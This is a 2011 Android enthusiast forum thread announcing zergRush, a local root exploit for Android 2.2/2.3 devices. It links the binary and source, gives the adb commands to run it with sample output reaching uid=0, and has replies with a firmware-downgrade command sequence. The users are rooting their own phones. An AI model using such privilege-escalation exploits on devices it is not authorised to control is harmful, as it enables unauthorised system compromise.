Revolutionary - zergRush local root 2.2/2.3 [22-10: Samsung/SE update]

Search This thread

ieftm

Retired Recognized Developer
Apr 17, 2008
291
1,761
revolutionary-banner.png


Hello!

We would like to announce the public availability of the root exploit we use in Revolutionary, named zergRush.

This local root exploit should be Android-wide, across Froyo (2.2) and Gingerbread (2.3). However, this will not work on Android Honeycomb and up (3.0+).

Simultaneously, we're also releasing source code for this root exploit through our github.

The binary is available from here: zergRush binary.

The exploit source is available here: Revolutionary GitHub.

Usage:

You will need adb shell to execute this exploit. We need shell permissions.
Push the binary onto /data/local/ and execute these commands in a shell:

Code:
$ chmod 755 /data/local/zergRush
$ /data/local/zergRush

The resulting output should look something like this:

Code:
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.

[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.

[+] Found a GingerBread ! 0x00017118
[*] Sending 149 zerglings ...
[*] Trying a new path ...
[*] Sending 149 zerglings ...
[*] Trying a new path ...
[*] Sending 149 zerglings ...
[*] Trying a new path ...
[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x401219c4 0x0054
[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd260a9 0xafd39f9f
[*] Poping 24 more zerglings
[*] Sending 173 zerglings ...

[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root..enjoy!

*reconnect adb shell*

Code:
# id
uid=0 gid=0

That is all folks!

Update 20-10-2011: zergRush has been updated to include some support for Sony Ericsson phones, updates for Samsung coming soon!
Update 22-10-2011: updates for Samsung phones, get the new download (or build yourself)
 
Last edited:
D

Deleted member 4244585

Guest
Does this work on the Evo 3D with Hboot1.5?
 

ingro

Senior Member
Sep 7, 2011
111
9
very cool script, even tough I really hate lings rush, as I'm a protoss player :p
 

dapaua

Senior Member
Dec 27, 2006
360
247
Barcelona
Reboot?

It worked in my HTC Chacha. Then I remounted System as rw. And then after a while(about 30 secs), my device reboots.
I tried it twice, after deleting /data/local/tmp/*
Is it normal? My device is S-ON.

Edited: I found it, it is because I modified the system partition, because after reboot it was as before.
Thank you.
 
Last edited:
  • Like
Reactions: kiansoft

qzem

Senior Member
Jun 23, 2010
1,594
1,030
It is not working on my new Samsung w i8150, with Gingerbread 2.3.5 :(. But thanks for your work anyway!

I've got something like (if someone might be willing to help):

Zerglings haven't found anything interesting...

I can post screenshot later.
 
Last edited:

qzem

Senior Member
Jun 23, 2010
1,594
1,030
Here is screenshot of what I get when trying this method. Anyone who could solve this?
 

Attachments

  • zergRush.png
    zergRush.png
    86.9 KB · Views: 1,337

attn1

Inactive Recognized Developer
Mar 18, 2010
2,554
1,816
What can I do with that? I'm not being sarcastic, I'm curious what the next steps would be? My goal is to be able to flash a rom/kernel and not lose root after rebooting.




downgrade to .97?


Yeah, here's how:

Code:
adb shell rm -r /data/local/tmp/*
adb push zergRush /data/local/tmp/zergRush
adb push misc_version /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/zergRush
adb shell chmod 777 /data/local/tmp/misc_version
adb shell /data/local/tmp/zergRush
adb shell /data/local/tmp/sh -c '/data/local/tmp/misc_version -s 2.18.605.3'
adb reboot bootloader
fastboot oem rebootRUU
fastboot erase cache
fastboot flash zip RUU_Vivo_W_Gingerbread_S_VERIZON_WWE_2.18.605.3_Radio_1.09.01.0622_NV_VZW1.92_release_199487_signed.zip
fastboot reboot

a little kit for it - http://forum.xda-developers.com/showthread.php?t=1298990
 
Last edited:

Top Liked Posts

  • There are no posts matching your filters.
  • 87
    revolutionary-banner.png


    Hello!

    We would like to announce the public availability of the root exploit we use in Revolutionary, named zergRush.

    This local root exploit should be Android-wide, across Froyo (2.2) and Gingerbread (2.3). However, this will not work on Android Honeycomb and up (3.0+).

    Simultaneously, we're also releasing source code for this root exploit through our github.

    The binary is available from here: zergRush binary.

    The exploit source is available here: Revolutionary GitHub.

    Usage:

    You will need adb shell to execute this exploit. We need shell permissions.
    Push the binary onto /data/local/ and execute these commands in a shell:

    Code:
    $ chmod 755 /data/local/zergRush
    $ /data/local/zergRush

    The resulting output should look something like this:

    Code:
    [**] Zerg rush - Android 2.2/2.3 local root
    [**] (C) 2011 Revolutionary. All rights reserved.
    
    [**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
    
    [+] Found a GingerBread ! 0x00017118
    [*] Sending 149 zerglings ...
    [*] Trying a new path ...
    [*] Sending 149 zerglings ...
    [*] Trying a new path ...
    [*] Sending 149 zerglings ...
    [*] Trying a new path ...
    [*] Sending 149 zerglings ...
    [+] Zerglings caused crash (good news): 0x401219c4 0x0054
    [*] Researching Metabolic Boost ...
    [+] Speedlings on the go ! 0xafd260a9 0xafd39f9f
    [*] Poping 24 more zerglings
    [*] Sending 173 zerglings ...
    
    [+] Rush did it ! It's a GG, man !
    [+] Killing ADB and restarting as root..enjoy!

    *reconnect adb shell*

    Code:
    # id
    uid=0 gid=0

    That is all folks!

    Update 20-10-2011: zergRush has been updated to include some support for Sony Ericsson phones, updates for Samsung coming soon!
    Update 22-10-2011: updates for Samsung phones, get the new download (or build yourself)
    8
    I have tried the most recent zergRush on my Vizio VTAB 1008 running Gingerbread 2.3.2 and this exploit did not work. Here is the complete output which I ran in manual mode.

    $ ./zergRush

    [**] Zerg rush - Android 2.2/2.3 local root
    [**] (C) 2011 Revolutionary. All rights reserved.

    [**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.

    [+] Found a GingerBread ! 0x00015118
    [*] Scooting ...
    [*] Sending 149 zerglings ...
    [+] Zerglings found a way to enter ! 0x10
    [+] Overseer found a path ! 0x000151e0
    [*] Sending 149 zerglings ...
    [+] Zerglings caused crash (good news): 0x40119cd4 0x0054
    [*] Researching Metabolic Boost ...
    [+] Speedlings on the go ! 0x8001a737 0x8003a4bf
    [*] Popping 24 more zerglings
    [*] Sending 173 zerglings ...

    [-] Bad luck, our rush did not succeed :(

    I did notice that other earlier versions of zergRush had been tried on this tablet but none succeeded in rooting it.

    Is it possible to modify the exploit so that it could succeed on this device? Or is it possible that this vulnerability has been patched and will not succeed at all?

    Any help provided by anyone will be HUGELY appreciated. If this helps, I do have the Android source code installed and am able to compile this from source code as needed.

    All other exploits have failed on this tablet. I have tried rageagainsthecage, gingerbreak, etc. It is difficult to believe that Vizio has made such a secure tablet with no exploitable vulnerabilities.

    Thanks again... Getting desperate...

    New version updated to fix this problem, check the GIT ;)
    2
    Getting "[-] Cannot copy boomsh.: Permission denied" from the shell when attempting to run zergRush on HTC Amaze. This was the 2nd time running on this phone after a reboot. The 1st time was successful, however my wife pulled me away so I couldn't finish what I wanted to do with root. No, I'm not going to divorce her over this. :)

    Code:
    macpro:platform-tools $ /android/platform-tools/adb push /android/temp/zergRush /data/local/zergRush
    2076 KB/s (21215 bytes in 0.009s)
    macpro:platform-tools $ /android/platform-tools/adb shell
    $ chmod 755 /data/local/zergRush
    $ /data/local/zergRush
    
    [**] Zerg rush - Android 2.2/2.3 local root
    [**] (C) 2011 Revolutionary. All rights reserved.
    
    [**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.
    
    [-] Cannot copy boomsh.: Permission denied
    $ macpro:platform-tools $

    You may need to create /data/local/tmp first.
    Also, if you've already ran this once, you might need to clean up this directory - remove boomsh/sh.
    2
    Anyone that might still find use in this exploit should have a look at DooMLoRD's Easy Rooting Toolkit which uses the zergRush exploit
    1
    Reboot?

    It worked in my HTC Chacha. Then I remounted System as rw. And then after a while(about 30 secs), my device reboots.
    I tried it twice, after deleting /data/local/tmp/*
    Is it normal? My device is S-ON.

    Edited: I found it, it is because I modified the system partition, because after reboot it was as before.
    Thank you.